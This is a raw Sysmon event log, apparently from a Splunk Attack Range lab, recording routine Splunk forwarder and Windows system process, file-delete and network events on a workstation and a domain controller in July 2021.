10341000x8000000000000000809250Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F6D7-60EB-B779-00000000D001}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809249Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.610{0C1E0330-F6D7-60EB-B779-00000000D001}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809248Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.078{0C1E0330-F6D6-60EB-B679-00000000D001}23601904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809279Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.969{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F1907AB479264704425ED144C380F99,SHA256=7AE21F78F819F8055642044FE96FC057C94F32D2AC5A1466BB05B945E33B1888,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:28.287{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BDF3071A1BAC0F398DE7FA5496EB029,SHA256=B1EA4295FB322F9EF56274C74244C121E874D734F364C45A0D1956C06FC06622,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809278Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.469{0C1E0330-F6D8-60EB-B879-00000000D001}32401576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809277Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.313{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F6D8-60EB-B879-00000000D001}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809276Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809275Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809274Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809273Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809272Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809271Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809270Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809269Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809268Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809267Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.313{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F6D8-60EB-B879-00000000D001}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809266Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.297{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F6D8-60EB-B879-00000000D001}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809265Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.298{0C1E0330-F6D8-60EB-B879-00000000D001}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809264Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.063{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C697E80B749F186D987DD49F2BA42DF8,SHA256=467979AF05262094BE57EBBB32BDB700EAFC922931D0AC11705A4FE6039E5680,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:29.302{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=855A3FDD63BF05925712924915BC9D36,SHA256=38BDA96D5220CAE8CBB58BA17C908D5EB6F4610C3D669CFB36C6D18DE5D0F853,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809280Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:29.328{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=060D3544C25DC422763810E3AB4A5B9E,SHA256=DF1B8F717BAED8FEC266AC81B03689749DD59031814D034BE6369B9444F4F837,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:30.317{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E0AA4AE2E845CDBF9ED92CD30FF98EB,SHA256=4EBF30364C0FD59DA3F148CF8E921292F8381C2ED542D4EF6A91C83DE75F0D25,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809283Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:29.180{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57383-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809282Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:30.172{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=29D811663DEE001978DD5A2812F60FB4,SHA256=A2C9D6ECED993D51525D50093449620B577956487F4DE239F6C5B50F049F649B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809281Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:30.000{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E732CCFF3B16CD17CA98C5C1AC676E73,SHA256=69F12BCB2DA20FD35E6DDDDC28E0018A3E23D0BED451143DC136AD44322B12D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:30.170{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:30.170{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:31.347{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A6BAEE15271131C8C46F96EF3BC10E9,SHA256=0D23F2B2AC164B6CE794025D8C83E0871A1886EBF3B7E41D736A604DAA0659AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809284Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:31.000{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=456E35C459E657C3C7EF23E0DAECFC7F,SHA256=ED9C4C6DA4F1F1AA3DCCA624773CC6E7E244F470A5A65D1026D7FE8E79A0C501,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:32.364{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=530C285963F64A54E9E2D86C8345DCFD,SHA256=F3BC93D825D2EAD49DBC36A2FD912E5FFD94D8E03DCA82065C7AEB205E164EB6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:24.581{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51160-false10.0.1.12-8000- 23542300x8000000000000000809285Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:32.063{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F1AB8FC378E30A34DD8463BCC9AD556,SHA256=9EC3B0FB4F7D837CDDC289DA18DC1A320129BF815D667E903AE7F2945FC8B1F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:33.367{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABD1001E3E4043BA65F265D3144E3B52,SHA256=1822F6818877EFC13BB323E8BA3B8E687D79CF8795EE7A11BC605C4B6ED541A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809287Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:33.922{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 